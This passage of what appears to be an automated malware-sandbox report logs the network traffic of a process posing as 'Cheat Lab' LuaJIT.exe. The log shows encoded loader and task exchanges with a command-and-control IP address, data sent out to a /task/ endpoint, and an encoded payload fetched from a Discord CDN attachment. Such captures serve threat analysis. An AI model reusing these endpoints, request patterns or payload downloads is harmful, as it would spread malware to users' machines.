                                                                                                                                                                      Nov 6, 2023 15:35:07.013747931 CET17OUTData Raw: 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00
                                                                                                                                                                      Data Ascii: vlg$$#################################
                                                                                                                                                                      Nov 6, 2023 15:35:07.013850927 CET39OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 c2 c2 c2 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18
                                                                                                                                                                      Data Ascii: ##################""""""""""""""""""""""#####################"""###"""""
                                                                                                                                                                      Nov 6, 2023 15:35:07.354974031 CET47OUTData Raw: 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18
                                                                                                                                                                      Data Ascii: """""""""""""#####################"""""""""""""""""""""""""""""""""""""""""""""""
                                                                                                                                                                      Nov 6, 2023 15:35:07.355123043 CET74OUTData Raw: 18 00 22 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18
                                                                                                                                                                      Data Ascii: "#####################""""""""""""""""""""""""""""""""""""""""""""""""""""#%#%"$}044
                                                                                                                                                                      Nov 6, 2023 15:35:07.356364965 CET76OUTData Raw: 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17
                                                                                                                                                                      Data Ascii: """""""""""""""""""""""""""""""EVTQtBBBBBBBBBBBBRUV4UU""""""""""""""""""""""""""E$I
                                                                                                                                                                      Nov 6, 2023 15:35:07.356441975 CET81OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 de de de 12 12 12 b4 b4 b4 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 b4 b4 b4 12 12 12 d5 d5 d5 f2 f2 f2
                                                                                                                                                                      Data Ascii: +uu+R+uu+R+uu+R+RR+u+Ru+RRu+R
                                                                                                                                                                      Nov 6, 2023 15:35:07.704330921 CET145OUTData Raw: 18 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 48 95 aa 5c d4 ff 5c d4 ff 5b d3 fd 5a d1 fb 5a d0 fa 59 cf f8 59 cf
                                                                                                                                                                      Data Ascii: """""""""""""""""""H\\[ZZYYYYYYYYYYZ[[\\6VU""""""""""""""""""""""""""L-L-L-L-@ym*9_|/|/|/|/}/
                                                                                                                                                                      Nov 6, 2023 15:35:07.704554081 CET151OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 6, 2023 15:35:08.044728994 CET179OUTData Raw: 1d 0f 00 1d 0f 00 1d 0f 00 1d 0f 00 1d 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                                                                                                      Data Ascii:
                                                                                                                                                                      Nov 6, 2023 15:35:11.267046928 CET3883INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                      Date: Mon, 06 Nov 2023 14:35:11 GMT
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      Content-Length: 2064
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lYxRLgZohEZTUF2mKIZd34r1HmIY4AzlPVJEHy5RVFZmIa7ShhzFniR6rG4Z9y1r2QP%2F8479uiP6xysfBvNd70aX300uDQmOwO2H9hW%2Fs5gBoEVjPPkkZcIcnLkka9M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      CF-RAY: 821e0fbbdca265a2-FRA
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      Data Raw: 7b 22 6c 6f 61 64 65 72 22 3a 22 59 6a 4d 73 4e 57 49 73 5a 44 49 73 59 6d 4d 73 59 6d 59 73 4f 54 49 73 59 7a 45 73 5a 47 59 73 59 57 49 73 59 6a 59 73 5a 44 41 73 59 6d 45 73 59 6d 59 73 5a 44 55 73 59 7a 59 73 4f 57 51 73 59 6a 59 73 4f 54 59 73 4f 54 51 73 4f 47 51 73 4e 32 49 73 59 54 4d 73 4e 6a 4d 73 4e 54 59 73 4f 54 4d 73 59 6a 59 73 59 7a 55 73 5a 44 49 73 59 7a 63 73 5a 47 45 73 59 7a 59 73 4e 6a 67 73 4e 7a 49 73 4e 54 6b 73 59 54 45 73 4e 6d 59 73 4e 6d 59 73 4e 54 4d 73 59 7a 41 73 5a 44 45 73 59 6a 67 73 59 6a 4d 73 5a 54 41 73 59 7a 49 73 59 6d 51 73 59 32 59 73 4f 44 51 73 4e 7a 49 73 4e 6a 51 73 5a 57 59 73 4e 32 4d 73 5a 54 45 73 59 6a 51 73 5a 54 51 73 59 54 67 73 4e 54 59 73 4e 6d 4d 73 4e 6a 45 73 4e 32 55 73 4f 54 51 73 4f 44 45 73 4f 44 55 73 4e 32 45 73 59 6a 6b 73 59 57 4d 73 4f 57 45 73 5a 54 51 73 59 6a 67 73 59 7a 49 73 4e 54 4d 73 4f 44 67 73 4f 47 4d 73 59 6a 49 73 59 6a 4d 73 5a 44 63 73 59 7a 63 73 59 6d 59 73 5a 54 51 73 4f 47 55 73 4e 54 67 73 4e 6a 59 73 5a 54 67 73 59 6d 49 73 59 32 59 73 59 6a 63 73 5a 47 4d 73 59 6a 63 73 4e 54 59 73 4e 6d 4d 73 4e 6a 45 73 59 32 4d 73 4f 44 55 73 59 7a 6b 73 59 32 45 73 5a 44 41 73 59 6d 45 73 4e 57 45 73 4e 7a 4d 73 4f 54 41 73 4e 6a 55 73 4f 54 41 73 4f 57 59 73 4e 6d 55 73 5a 44 45 73 59 6d 55 73 59 7a 51 73 5a 47 45 73 59 7a 59 73 4e 32 45 73 5a 44 59 73 59 7a 55 73 4f 57 49 73 59 6a 6b 73 5a 54 59 73 59 32 4d 73 5a 44 49 73 59 57 59 73 4f 54 6b 73 4e 6d 59 73 4e 54 51 73 4e 54 51 73 59 6a 51 73 59 7a 55 73 59 7a 51 73 59 7a 6b 73 5a 47 45 73 59 32 49 73 4e 6a 67 73 4e 7a 49 73 4e 54 6b 73 5a 44 59 73 59 54 51 73 59 6d 49 73 59 54 51 73 59 6a 4d 73 5a 54 6b 73 4e 7a 67 73 4e 7a 49 73 4f 47 51 73 59 6d 4d 73 59 7a 4d 73 59 32 49 73 59 7a 63 73 4e 57 45 73 4e 32 55 73 4f 54 51 73 4f 47 45 73 4f 54 6b 73 4e 6d 49 73 4f 54 6b 73 59 6a 4d 73 4f 54 6b 73 59 54 51 73 59 6a 51 73 59 6d 45 73 5a 44 59 73 59 7a 6b 73 59 32 45 73 59 7a 59 73 59 54 6b 73 4f 57 51 73 4e 57 49 73 59 57 45 73 4e 6a 4d 73 4f 44 41 73 59 57 55 73 22 2c 22 74 61 73 6b 73 22 3a 22 4f 54 4d 73 59 6a 51 73 4f 54 49 73 59 57 4d 73 59 6a 4d 73 4e 54 4d 73 4f 44 67 73 4f 47
                                                                                                                                                                      Data Ascii: {"loader":"YjMsNWIsZDIsYmMsYmYsOTIsYzEsZGYsYWIsYjYsZDAsYmEsYmYsZDUsYzYsOWQsYjYsOTYsOTQsOGQsN2IsYTMsNjMsNTYsOTMsYjYsYzUsZDIsYzcsZGEsYzYsNjgsNzIsNTksYTEsNmYsNmYsNTMsYzAsZDEsYjgsYjMsZTAsYzIsYmQsY2YsODQsNzIsNjQsZWYsN2MsZTEsYjQsZTQsYTgsNTYsNmMsNjEsN2UsOTQsODEsODUsN2EsYjksYWMsOWEsZTQsYjgsYzIsNTMsODgsOGMsYjIsYjMsZDcsYzcsYmYsZTQsOGUsNTgsNjYsZTgsYmIsY2YsYjcsZGMsYjcsNTYsNmMsNjEsY2MsODUsYzksY2EsZDAsYmEsNWEsNzMsOTAsNjUsOTAsOWYsNmUsZDEsYmUsYzQsZGEsYzYsN2EsZDYsYzUsOWIsYjksZTYsY2MsZDIsYWYsOTksNmYsNTQsNTQsYjQsYzUsYzQsYzksZGEsY2IsNjgsNzIsNTksZDYsYTQsYmIsYTQsYjMsZTksNzgsNzIsOGQsYmMsYzMsY2IsYzcsNWEsN2UsOTQsOGEsOTksNmIsOTksYjMsOTksYTQsYjQsYmEsZDYsYzksY2EsYzYsYTksOWQsNWIsYWEsNjMsODAsYWUs","tasks":"OTMsYjQsOTIsYWMsYjMsNTMsODgsOG
                                                                                                                                                                      Nov 6, 2023 15:35:11.267074108 CET3884INData Raw: 4d 73 4f 44 4d 73 4f 44 59 73 4f 57 51 73 4f 44 41 73 4e 32 45 73 4f 44 6b 73 59 32 55 73 59 54 45 73 59 6a 49 73 5a 47 59 73 4e 32 4d 73 59 54 63 73 4e 6d 49 73 4f 54 6b 73 59 57 49 73 59 54 67 73 59 54 59 73 59 6a 45 73 59 7a 51 73 4f 57 51 73
                                                                                                                                                                      Data Ascii: MsODMsODYsOWQsODAsN2EsODksY2UsYTEsYjIsZGYsN2MsYTcsNmIsOTksYWIsYTgsYTYsYjEsYzQsOWQsODQsOTQsYmIsYWEsYTYsNjcsZDQsYWMsYzIsOTQsYmQsZGUsYjAsYjMsZGIsYzQsODgsY2EsZDEsYTUsNzMsZDUsY2UsZTEsYWMsZGEsYWIsYTEsOTcsYWYsYzUsZDYsODQsOTYsODksN2MsNmUsNmYsYTksNzcsO
                                                                                                                                                                      Nov 6, 2023 15:35:11.267086983 CET3884INData Raw: 59 6d 49 73 5a 54 45 73 59 6a 6b 73 59 32 4d 73 5a 54 41 73 4f 44 51 73 4e 7a 49 73 4e 6a 51 73 4f 54 59 73 59 6d 49 73 5a 47 49 73 59 7a 51 73 4f 54 6b 73 59 7a 41 73 4f 54 45 73 22 7d
                                                                                                                                                                      Data Ascii: YmIsZTEsYjksY2MsZTAsODQsNzIsNjQsOTYsYmIsZGIsYzQsOTksYzAsOTEs"}
                                                                                                                                                                      Nov 6, 2023 15:35:52.639214993 CET4921OUTPUT /task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      User-Agent: Sun
                                                                                                                                                                      Host: 193.37.71.112
                                                                                                                                                                      Content-Length: 95
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Data Raw: 7b 22 64 61 74 61 22 3a 22 59 57 4d 73 4f 57 45 73 5a 54 4d 73 59 57 55 73 4f 54 67 73 4f 54 55 73 4f 47 49 73 59 54 4d 73 4f 44 41 73 4f 44 51 73 4f 54 45 73 59 6a 63 73 59 7a 6b 73 5a 47 4d 73 5a 44 41 73 59 57 4d 73 59 6a 59 73 5a 57 51 73 4f 54 63 73 59 7a 49 73 4f 57 55 3d 22 7d
                                                                                                                                                                      Data Ascii: {"data":"YWMsOWEsZTMsYWUsOTgsOTUsOGIsYTMsODAsODQsOTEsYjcsYzksZGMsZDAsYWMsYjYsZWQsOTcsYzIsOWU="}
                                                                                                                                                                      Nov 6, 2023 15:35:53.208043098 CET4921INHTTP/1.1 204 No Content
                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                      Date: Mon, 06 Nov 2023 14:35:53 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0XOucqCjvv3VPRkcvMwYyuwKnEAD2qCaLXqzPo6gPL9MX0PhDH6TMstGRTGYdpGvaGd2sq74d4ZKiS0ovsapE3zr2%2FLXGd5TtZAKbDNEWr5qvPH4iiYBKCUWG%2FaEIHze94bwHqIUbuMgZzM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      CF-RAY: 821e10c759569c01-FRA
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      3192.168.2.849709162.159.135.23380C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Nov 6, 2023 15:35:11.752551079 CET3885OUTGET /attachments/1166694393298817025/1171047481182793729/2.txt HTTP/1.1
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      User-Agent: Sun
                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Nov 6, 2023 15:35:11.924105883 CET3886INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Date: Mon, 06 Nov 2023 14:35:11 GMT
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                      Expires: Mon, 06 Nov 2023 15:35:11 GMT
                                                                                                                                                                      Location: https://cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txt
                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                      Set-Cookie: __cf_bm=5TVRDgPAgt7sc6gsEttnfN0eDDrfzltqZkEmXeQrSGI-1699281311-0-Ach3L7F2jrD2g1+SXtBkwMSCeBQHpGNsVTTE68SlkNmKmSeVEdy1XlrN3NZRaM5Usel7HW4WuQx/wkDdjnJvM5Q=; path=/; expires=Mon, 06-Nov-23 15:05:11 GMT; domain=.discordapp.com; HttpOnly; SameSite=None
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q42IxppLrkHmZdrEB4whVBnBS6R4Y3H6PhBmM1miJwy0zOU2%2FGPVN5myohAqB6xZlJo4hqvJ9Q30G3Y1HsqQ95g%2FALicG7F4uLFBAImEeojH7kscW6PlTgNGaWtKRffo2B9v1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Set-Cookie: _cfuvid=raqL3qnypn7be7P8ZI1DqIF7wMtLn1AIkoosLiGT3OU-1699281311839-0-604800000; path=/; domain=.discordapp.com; HttpOnly
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 821e0fc6ea5430a7-SEA
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      0192.168.2.849710162.159.135.233443C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2023-11-06 14:35:15 UTC0OUTGET /attachments/1166694393298817025/1171047481182793729/2.txt HTTP/1.1
                                                                                                                                                                      User-Agent: Sun
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cookie: __cf_bm=5TVRDgPAgt7sc6gsEttnfN0eDDrfzltqZkEmXeQrSGI-1699281311-0-Ach3L7F2jrD2g1+SXtBkwMSCeBQHpGNsVTTE68SlkNmKmSeVEdy1XlrN3NZRaM5Usel7HW4WuQx/wkDdjnJvM5Q=; _cfuvid=raqL3qnypn7be7P8ZI1DqIF7wMtLn1AIkoosLiGT3OU-1699281311839-0-604800000
                                                                                                                                                                      2023-11-06 14:35:15 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 06 Nov 2023 14:35:15 GMT
                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                      Content-Length: 978522
                                                                                                                                                                      Connection: close
                                                                                                                                                                      CF-Ray: 821e0fdc285ac668-SEA
                                                                                                                                                                      CF-Cache-Status: MISS
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                      Content-Disposition: attachment; filename="2.txt"
                                                                                                                                                                      ETag: "596ff0fbdbcf4853e72308b8178664d6"
                                                                                                                                                                      Expires: Tue, 05 Nov 2024 14:35:15 GMT
                                                                                                                                                                      Last-Modified: Mon, 06 Nov 2023 11:24:36 GMT
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                      x-goog-generation: 1699269876595408
                                                                                                                                                                      x-goog-hash: crc32c=dySmqg==
                                                                                                                                                                      x-goog-hash: md5=WW/w+9vPSFPnIwi4F4Zk1g==
                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                      x-goog-stored-content-length: 978522
                                                                                                                                                                      X-GUploader-UploadID: ABPtcPoBAxXdhwEMXxAeqdLnto03XOQVj2B1WXevQ9JFDCTopA-1EaCYZskeOb4KRiFBuXQXmMo
                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=h5nRtvmgwBNMnGFUtKf3fvcrQX39G4xpccV1Jshs1a4coC74a9EpX8%2Bh1y6Ze1rJ0Lyo6J%2B%2FjKl9JEJKRS1Z3uoWhoqkXTnd%2FOVqyUv6ZPEb9mqy3wis1YS0jMUJq6Bv6miq5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      2023-11-06 14:35:15 UTC1INData Raw: 38 35 2c 39 33 2c 31 30 30 2c 34 33 2c 35 32 2c 33 31 2c 34 65 2c 36 63 2c 35 30 2c 35 32 2c 36 62 2c 35 34 2c 31 35 39 2c 31 36 36 2c 36 32 2c 33 38 2c 66 63 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 37 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30
                                                                                                                                                                      Data Ascii: 85,93,100,43,52,31,4e,6c,50,52,6b,54,159,166,62,38,fc,74,5a,6d,4b,77,43,34,72,41,51,63,55,65,58,46,38,39,70
                                                                                                                                                                      2023-11-06 14:35:15 UTC1INData Raw: 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 31 32 64 2c 36 35 2c 35 38 2c 34 36 2c 34 36 2c 35 38 2c 31 32 61 2c 35 31 2c 34 66 2c 65 35 2c 35 37 2c 31 33 39 2c 36 64 2c 31 30 61 2c 36 63 2c 61 30 2c 31 32 37 2c 38 38 2c 62 36 2c 61 30 2c 61 64 2c 65 37 2c 37 61 2c 64 64 2c 62 64 2c 65 36 2c 61 61 2c 61 36 2c 39 33 2c 61 65 2c 37 31 2c 63 36 2c 62 36 2c 64 33 2c 63 36 2c 62 35 2c 61 63 2c 35 39 2c 64 32 2c 61 38 2c 36 66 2c 61 33 2c 63 33 2c 64 61 2c 36 63 2c 62 62 2c 64 39 2c 37 34 2c 39 65 2c 62 36 2c 62 35 2c 35 38 2c 62 31 2c 65 33 2c 62 65 2c 64 32 2c 37 39 2c 38 34 2c
                                                                                                                                                                      Data Ascii: ,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,12d,65,58,46,46,58,12a,51,4f,e5,57,139,6d,10a,6c,a0,127,88,b6,a0,ad,e7,7a,dd,bd,e6,aa,a6,93,ae,71,c6,b6,d3,c6,b5,ac,59,d2,a8,6f,a3,c3,da,6c,bb,d9,74,9e,b6,b5,58,b1,e3,be,d2,79,84,
                                                                                                                                                                      2023-11-06 14:35:15 UTC3INData Raw: 2c 34 36 2c 33 38 2c 61 31 2c 37 30 2c 34 33 2c 34 66 2c 33 35 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 36 62 2c 37 37 2c 34 33 2c 39 34 2c 36 30 2c 61 33 2c 63 34 2c 64 36 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 64 30 2c 35 61 2c 37 30 2c 34 33 2c 34 66 2c 62 31 2c 34 65 2c 36 63 2c 34 63 2c 37 34 2c 36 62 2c 35 34 2c 35 61 2c 64 33 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 37 35 2c 36 35 2c 35 38 2c 61 36 2c 36 36 2c 61 62 2c 64 34 2c 61 34 2c 63 33 2c 39 32 2c 34 65 2c 36 63 2c 65 36 2c 36 64 2c 36 62 2c 35 34 2c 35 61 2c 31 31 37 2c 36 32 2c 33 38 2c 34 34 2c 39 30 2c 35 61 2c 36
                                                                                                                                                                      Data Ascii: ,46,38,a1,70,43,4f,35,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,6b,77,43,94,60,a3,c4,d6,55,65,58,46,d0,5a,70,43,4f,b1,4e,6c,4c,74,6b,54,5a,d3,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,75,65,58,a6,66,ab,d4,a4,c3,92,4e,6c,e6,6d,6b,54,5a,117,62,38,44,90,5a,6
                                                                                                                                                                      2023-11-06 14:35:15 UTC4INData Raw: 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34
                                                                                                                                                                      Data Ascii: 1,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,4
                                                                                                                                                                      2023-11-06 14:35:15 UTC4INData Raw: 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 38 64 2c 63 34 2c 31 35 63 2c 39 36 2c 61 35 2c 38 38 2c 35 64 2c 31 33 34 2c 31 34 33 2c 31 32 32 2c 31 32 63 2c 31 32 34 2c 31 31 30 2c 31 32 32 2c 31 31 38 2c 33 38 2c 34 34 2c 37 34 2c 64 62 2c 31 35 38 2c 65 65 2c 37 37 2c 34 33 2c 33 34 2c 62 33 2c 31 30 63 2c 64 38 2c 36 33 2c 35 35 2c 36 35 2c 31 31 39 2c 31 30 36 2c 31 30 62 2c 31 33 30 2c 31 35 38 2c 31 30 34 2c 31 31 39 2c 31
                                                                                                                                                                      Data Ascii: 3,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,8d,c4,15c,96,a5,88,5d,134,143,122,12c,124,110,122,118,38,44,74,db,158,ee,77,43,34,b3,10c,d8,63,55,65,119,106,10b,130,158,104,119,1
                                                                                                                                                                      2023-11-06 14:35:15 UTC5INData Raw: 32 64 2c 31 31 65 2c 38 30 2c 65 65 2c 31 31 34 2c 64 34 2c 65 61 2c 31 32 39 2c 61 33 2c 31 30 35 2c 31 33 63 2c 61 38 2c 62 63 2c 31 34 32 2c 31 34 66 2c 31 30 34 2c 31 31 33 2c 66 34 2c 38 66 2c 31 31 32 2c 31 33 39 2c 36 61 2c 61 37 2c 61 37 2c 31 30 34 2c 31 33 34 2c 33 39 2c 37 30 2c 34 33 2c 39 65 2c 37 62 2c 31 34 35 2c 31 34 37 2c 31 34 33 2c 31 34 31 2c 31 36 32 2c 31 33 33 2c 36 39 2c 31 33 35 2c 31 32 33 2c 66 65 2c 38 66 2c 66 37 2c 31 33 38 2c 37 39 2c 63 65 2c 31 34 31 2c 37 32 2c 31 32 62 2c 31 31 61 2c 35 30 2c 31 31 63 2c 31 32 34 2c 31 31 63 2c 62 37 2c 31 34 66 2c 31 32 31 2c 31 32 66 2c 31 32 37 2c 31 33 31 2c 31 31 31 2c 66 30 2c 37 38 2c 31 34 35 2c 31 34 61 2c 31 34 33 2c 31 33 61 2c 62 31 2c 31 34 62 2c 31 32 61 2c 65 38 2c 31 32
                                                                                                                                                                      Data Ascii: 2d,11e,80,ee,114,d4,ea,129,a3,105,13c,a8,bc,142,14f,104,113,f4,8f,112,139,6a,a7,a7,104,134,39,70,43,9e,7b,145,147,143,141,162,133,69,135,123,fe,8f,f7,138,79,ce,141,72,12b,11a,50,11c,124,11c,b7,14f,121,12f,127,131,111,f0,78,145,14a,143,13a,b1,14b,12a,e8,12
